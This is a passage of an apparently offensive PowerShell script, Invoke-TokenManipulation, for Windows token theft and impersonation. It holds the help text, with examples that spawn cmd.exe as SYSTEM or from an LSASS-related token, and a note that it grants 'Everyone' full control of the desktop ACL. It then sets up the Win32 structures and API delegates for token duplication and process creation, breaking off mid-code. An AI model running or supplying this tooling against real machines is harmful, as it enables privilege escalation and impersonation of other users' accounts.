Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None Version: 1.11 (1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe) .DESCRIPTION Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. .PARAMETER Enumerate Switch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens). .PARAMETER RevToSelf Switch. Stops impersonating an alternate users Token. .PARAMETER ShowAll Switch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens). .PARAMETER ImpersonateUser Switch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId. This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead. .PARAMETER CreateProcess Specify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId. .PARAMETER WhoAmI Switch. Displays the credentials the PowerShell thread is running under. .PARAMETER Username Specify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user. .PARAMETER ProcessId Specify the Token to use by ProcessId. This will use the primary token of the process specified. .PARAMETER Process Specify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process. .PARAMETER ThreadId Specify the Token to use by ThreadId. This will use the token of the thread specified. .PARAMETER ProcessArgs Specify the arguments to start the specified process with when using the -CreateProcess mode. .PARAMETER NoUI If you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the current user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control to "Everyone". .PARAMETER PassThru If you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline. .EXAMPLE Invoke-TokenManipulation -Enumerate Lists all unique usable tokens on the computer. .EXAMPLE Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system" Spawns cmd.exe as SYSTEM. .EXAMPLE Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system" Makes the current PowerShell thread impersonate SYSTEM. .EXAMPLE Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500 Spawns cmd.exe using the primary token belonging to process ID 500. .EXAMPLE Invoke-TokenManipulation -ShowAll Lists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon. .EXAMPLE Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500 Spawns cmd.exe using the token belonging to thread ID 500. .EXAMPLE Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the "-Process" parameter of the script. .EXAMPLE (Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit() Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited. .EXAMPLE Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser Makes the current thread impersonate the lsass security token. .NOTES This script was inspired by incognito. Several of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/). BIG THANKS to Matt Graeber for helping debug. .LINK Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/ #> [CmdletBinding(DefaultParameterSetName="Enumerate")] Param( [Parameter(ParameterSetName = "Enumerate")] [Switch] $Enumerate, [Parameter(ParameterSetName = "RevToSelf")] [Switch] $RevToSelf, [Parameter(ParameterSetName = "ShowAll")] [Switch] $ShowAll, [Parameter(ParameterSetName = "ImpersonateUser")] [Switch] $ImpersonateUser, [Parameter(ParameterSetName = "CreateProcess")] [String] $CreateProcess, [Parameter(ParameterSetName = "WhoAmI")] [Switch] $WhoAmI, [Parameter(ParameterSetName = "ImpersonateUser")] [Parameter(ParameterSetName = "CreateProcess")] [String] $Username, [Parameter(ParameterSetName = "ImpersonateUser")] [Parameter(ParameterSetName = "CreateProcess")] [Int] $ProcessId, [Parameter(ParameterSetName = "ImpersonateUser", ValueFromPipeline=$true)] [Parameter(ParameterSetName = "CreateProcess", ValueFromPipeline=$true)] [System.Diagnostics.Process] $Process, [Parameter(ParameterSetName = "ImpersonateUser")] [Parameter(ParameterSetName = "CreateProcess")] $ThreadId, [Parameter(ParameterSetName = "CreateProcess")] [String] $ProcessArgs, [Parameter(ParameterSetName = "CreateProcess")] [Switch] $NoUI, [Parameter(ParameterSetName = "CreateProcess")] [Switch] $PassThru, [Parameter(Mandatory = $false,ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance ) Set-StrictMode -Version 2 #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ Function Get-DelegateType { Param ( [OutputType([Type])] [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), [Parameter( Position = 1 )] [Type] $ReturnType = [Void] ) $Domain = [AppDomain]::CurrentDomain $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') Write-Output $TypeBuilder.CreateType() } #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ Function Get-ProcAddress { Param ( [OutputType([IntPtr])] [Parameter( Position = 0, Mandatory = $True )] [String] $Module, [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure ) # Get a reference to System.dll in the GAC $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') # Get a reference to the GetModuleHandle and GetProcAddress methods $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') # Get a handle to the module specified $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } ############################### #Win32Constants ############################### $Constants = @{ ACCESS_SYSTEM_SECURITY = 0x01000000 READ_CONTROL = 0x00020000 SYNCHRONIZE = 0x00100000 STANDARD_RIGHTS_ALL = 0x001F0000 TOKEN_QUERY = 8 TOKEN_ADJUST_PRIVILEGES = 0x20 ERROR_NO_TOKEN = 0x3f0 SECURITY_DELEGATION = 3 DACL_SECURITY_INFORMATION = 0x4 ACCESS_ALLOWED_ACE_TYPE = 0x0 STANDARD_RIGHTS_REQUIRED = 0x000F0000 DESKTOP_GENERIC_ALL = 0x000F01FF WRITE_DAC = 0x00040000 OBJECT_INHERIT_ACE = 0x1 GRANT_ACCESS = 0x1 TRUSTEE_IS_NAME = 0x1 TRUSTEE_IS_SID = 0x0 TRUSTEE_IS_USER = 0x1 TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5 TRUSTEE_IS_GROUP = 0x2 PROCESS_QUERY_INFORMATION = 0x400 TOKEN_ASSIGN_PRIMARY = 0x1 TOKEN_DUPLICATE = 0x2 TOKEN_IMPERSONATE = 0x4 TOKEN_QUERY_SOURCE = 0x10 STANDARD_RIGHTS_READ = 0x20000 TokenStatistics = 10 TOKEN_ALL_ACCESS = 0xf01ff MAXIMUM_ALLOWED = 0x02000000 THREAD_ALL_ACCESS = 0x1f03ff ERROR_INVALID_PARAMETER = 0x57 LOGON_NETCREDENTIALS_ONLY = 0x2 SE_PRIVILEGE_ENABLED = 0x2 SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1 SE_PRIVILEGE_REMOVED = 0x4 } $Win32Constants = New-Object PSObject -Property $Constants ############################### ############################### #Win32Structures ############################### #Define all the structures/enums that will be used # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html $Domain = [AppDomain]::CurrentDomain $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] #ENUMs $TypeBuilder = $ModuleBuilder.DefineEnum('TOKEN_INFORMATION_CLASS', 'Public', [UInt32]) $TypeBuilder.DefineLiteral('TokenUser', [UInt32] 1) | Out-Null $TypeBuilder.DefineLiteral('TokenGroups', [UInt32] 2) | Out-Null $TypeBuilder.DefineLiteral('TokenPrivileges', [UInt32] 3) | Out-Null $TypeBuilder.DefineLiteral('TokenOwner', [UInt32] 4) | Out-Null $TypeBuilder.DefineLiteral('TokenPrimaryGroup', [UInt32] 5) | Out-Null $TypeBuilder.DefineLiteral('TokenDefaultDacl', [UInt32] 6) | Out-Null $TypeBuilder.DefineLiteral('TokenSource', [UInt32] 7) | Out-Null $TypeBuilder.DefineLiteral('TokenType', [UInt32] 8) | Out-Null $TypeBuilder.DefineLiteral('TokenImpersonationLevel', [UInt32] 9) | Out-Null $TypeBuilder.DefineLiteral('TokenStatistics', [UInt32] 10) | Out-Null $TypeBuilder.DefineLiteral('TokenRestrictedSids', [UInt32] 11) | Out-Null $TypeBuilder.DefineLiteral('TokenSessionId', [UInt32] 12) | Out-Null $TypeBuilder.DefineLiteral('TokenGroupsAndPrivileges', [UInt32] 13) | Out-Null $TypeBuilder.DefineLiteral('TokenSessionReference', [UInt32] 14) | Out-Null $TypeBuilder.DefineLiteral('TokenSandBoxInert', [UInt32] 15) | Out-Null $TypeBuilder.DefineLiteral('TokenAuditPolicy', [UInt32] 16) | Out-Null $TypeBuilder.DefineLiteral('TokenOrigin', [UInt32] 17) | Out-Null $TypeBuilder.DefineLiteral('TokenElevationType', [UInt32] 18) | Out-Null $TypeBuilder.DefineLiteral('TokenLinkedToken', [UInt32] 19) | Out-Null $TypeBuilder.DefineLiteral('TokenElevation', [UInt32] 20) | Out-Null $TypeBuilder.DefineLiteral('TokenHasRestrictions', [UInt32] 21) | Out-Null $TypeBuilder.DefineLiteral('TokenAccessInformation', [UInt32] 22) | Out-Null $TypeBuilder.DefineLiteral('TokenVirtualizationAllowed', [UInt32] 23) | Out-Null $TypeBuilder.DefineLiteral('TokenVirtualizationEnabled', [UInt32] 24) | Out-Null $TypeBuilder.DefineLiteral('TokenIntegrityLevel', [UInt32] 25) | Out-Null $TypeBuilder.DefineLiteral('TokenUIAccess', [UInt32] 26) | Out-Null $TypeBuilder.DefineLiteral('TokenMandatoryPolicy', [UInt32] 27) | Out-Null $TypeBuilder.DefineLiteral('TokenLogonSid', [UInt32] 28) | Out-Null $TypeBuilder.DefineLiteral('TokenIsAppContainer', [UInt32] 29) | Out-Null $TypeBuilder.DefineLiteral('TokenCapabilities', [UInt32] 30) | Out-Null $TypeBuilder.DefineLiteral('TokenAppContainerSid', [UInt32] 31) | Out-Null $TypeBuilder.DefineLiteral('TokenAppContainerNumber', [UInt32] 32) | Out-Null $TypeBuilder.DefineLiteral('TokenUserClaimAttributes', [UInt32] 33) | Out-Null $TypeBuilder.DefineLiteral('TokenDeviceClaimAttributes', [UInt32] 34) | Out-Null $TypeBuilder.DefineLiteral('TokenRestrictedUserClaimAttributes', [UInt32] 35) | Out-Null $TypeBuilder.DefineLiteral('TokenRestrictedDeviceClaimAttributes', [UInt32] 36) | Out-Null $TypeBuilder.DefineLiteral('TokenDeviceGroups', [UInt32] 37) | Out-Null $TypeBuilder.DefineLiteral('TokenRestrictedDeviceGroups', [UInt32] 38) | Out-Null $TypeBuilder.DefineLiteral('TokenSecurityAttributes', [UInt32] 39) | Out-Null $TypeBuilder.DefineLiteral('TokenIsRestricted', [UInt32] 40) | Out-Null $TypeBuilder.DefineLiteral('MaxTokenInfoClass', [UInt32] 41) | Out-Null $TOKEN_INFORMATION_CLASS = $TypeBuilder.CreateType() #STRUCTs $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LARGE_INTEGER', $Attributes, [System.ValueType], 8) $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null $LARGE_INTEGER = $TypeBuilder.CreateType() #Struct LUID $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('HighPart', [Int32], 'Public') | Out-Null $LUID = $TypeBuilder.CreateType() #Struct TOKEN_STATISTICS $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_STATISTICS', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('TokenId', $LUID, 'Public') | Out-Null $TypeBuilder.DefineField('AuthenticationId', $LUID, 'Public') | Out-Null $TypeBuilder.DefineField('ExpirationTime', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('TokenType', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('ImpersonationLevel', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('DynamicCharged', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('DynamicAvailable', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('GroupCount', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('ModifiedId', $LUID, 'Public') | Out-Null $TOKEN_STATISTICS = $TypeBuilder.CreateType() #Struct LSA_UNICODE_STRING $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LSA_UNICODE_STRING', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('Length', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('MaximumLength', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Buffer', [IntPtr], 'Public') | Out-Null $LSA_UNICODE_STRING = $TypeBuilder.CreateType() #Struct LSA_LAST_INTER_LOGON_INFO $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LSA_LAST_INTER_LOGON_INFO', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('LastSuccessfulLogon', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('LastFailedLogon', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('FailedAttemptCountSinceLastSuccessfulLogon', [UInt32], 'Public') | Out-Null $LSA_LAST_INTER_LOGON_INFO = $TypeBuilder.CreateType() #Struct SECURITY_LOGON_SESSION_DATA $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('SECURITY_LOGON_SESSION_DATA', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('Size', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('LoginID', $LUID, 'Public') | Out-Null $TypeBuilder.DefineField('Username', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('LoginDomain', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('AuthenticationPackage', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('LogonType', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Session', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Sid', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('LoginTime', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('LoginServer', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('DnsDomainName', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('Upn', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('UserFlags', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('LastLogonInfo', $LSA_LAST_INTER_LOGON_INFO, 'Public') | Out-Null $TypeBuilder.DefineField('LogonScript', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('ProfilePath', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('HomeDirectory', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('HomeDirectoryDrive', $LSA_UNICODE_STRING, 'Public') | Out-Null $TypeBuilder.DefineField('LogoffTime', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('KickOffTime', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('PasswordLastSet', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('PasswordCanChange', $LARGE_INTEGER, 'Public') | Out-Null $TypeBuilder.DefineField('PasswordMustChange', $LARGE_INTEGER, 'Public') | Out-Null $SECURITY_LOGON_SESSION_DATA = $TypeBuilder.CreateType() #Struct STARTUPINFO $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null $STARTUPINFO = $TypeBuilder.CreateType() #Struct PROCESS_INFORMATION $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null $PROCESS_INFORMATION = $TypeBuilder.CreateType() #Struct TOKEN_ELEVATION $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_ELEVATION', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('TokenIsElevated', [UInt32], 'Public') | Out-Null $TOKEN_ELEVATION = $TypeBuilder.CreateType() #Struct LUID_AND_ATTRIBUTES $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() #Struct TOKEN_PRIVILEGES $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() #Struct ACE_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('ACE_HEADER', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('AceType', [Byte], 'Public') | Out-Null $TypeBuilder.DefineField('AceFlags', [Byte], 'Public') | Out-Null $TypeBuilder.DefineField('AceSize', [UInt16], 'Public') | Out-Null $ACE_HEADER = $TypeBuilder.CreateType() #Struct ACL $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('ACL', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('AclRevision', [Byte], 'Public') | Out-Null $TypeBuilder.DefineField('Sbz1', [Byte], 'Public') | Out-Null $TypeBuilder.DefineField('AclSize', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('AceCount', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Sbz2', [UInt16], 'Public') | Out-Null $ACL = $TypeBuilder.CreateType() #Struct ACE_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('ACCESS_ALLOWED_ACE', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('Header', $ACE_HEADER, 'Public') | Out-Null $TypeBuilder.DefineField('Mask', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SidStart', [UInt32], 'Public') | Out-Null $ACCESS_ALLOWED_ACE = $TypeBuilder.CreateType() #Struct TRUSTEE $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('TRUSTEE', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('pMultipleTrustee', [IntPtr], 'Public') | Out-Null $TypeBuilder.DefineField('MultipleTrusteeOperation', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('TrusteeForm', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('TrusteeType', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('ptstrName', [IntPtr], 'Public') | Out-Null $TRUSTEE = $TypeBuilder.CreateType() #Struct EXPLICIT_ACCESS $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('EXPLICIT_ACCESS', $Attributes, [System.ValueType]) $TypeBuilder.DefineField('grfAccessPermissions', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('grfAccessMode', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('grfInheritance', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Trustee', $TRUSTEE, 'Public') | Out-Null $EXPLICIT_ACCESS = $TypeBuilder.CreateType() ############################### ############################### #Win32Functions ############################### $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken $OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool]) $OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate) $GetTokenInformationAddr = Get-ProcAddress advapi32.dll GetTokenInformation $GetTokenInformationDelegate = Get-DelegateType @([IntPtr], $TOKEN_INFORMATION_CLASS, [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) $GetTokenInformation = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetTokenInformationAddr, $GetTokenInformationDelegate) $SetThreadTokenAddr = Get-ProcAddress advapi32.dll SetThreadToken $SetThreadTokenDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Bool]) $SetThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetThreadTokenAddr, $SetThreadTokenDelegate) $ImpersonateLoggedOnUserAddr = Get-ProcAddress advapi32.dll ImpersonateLoggedOnUser $ImpersonateLoggedOnUserDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $ImpersonateLoggedOnUser = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateLoggedOnUserAddr, $ImpersonateLoggedOnUserDelegate) $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf $RevertToSelfDelegate = Get-DelegateType @() ([Bool]) $RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate) $LsaGetLogonSessionDataAddr = Get-ProcAddress secur32.dll LsaGetLogonSessionData $LsaGetLogonSessionDataDelegate = Get-DelegateType @([IntPtr], [IntPtr].MakeByRefType()) ([UInt32]) $LsaGetLogonSessionData = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaGetLogonSessionDataAddr, $LsaGetLogonSessionDataDelegate) $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW $CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool]) $CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate) $memsetAddr = Get-ProcAddress msvcrt.dll memset $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx $DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool]) $DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate) $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool]) $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate) $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer $LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32]) $LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate) $OpenThreadAddr = Get-ProcAddress kernel32.dll OpenThread $OpenThreadDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadAddr, $OpenThreadDelegate) $OpenThreadTokenAddr = Get-ProcAddress advapi32.dll OpenThreadToken $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) $CreateProcessAsUserWAddr = Get-ProcAddress advapi32.dll CreateProcessAsUserW $CreateProcessAsUserWDelegate = Get-DelegateType @([IntPtr], [IntPtr], 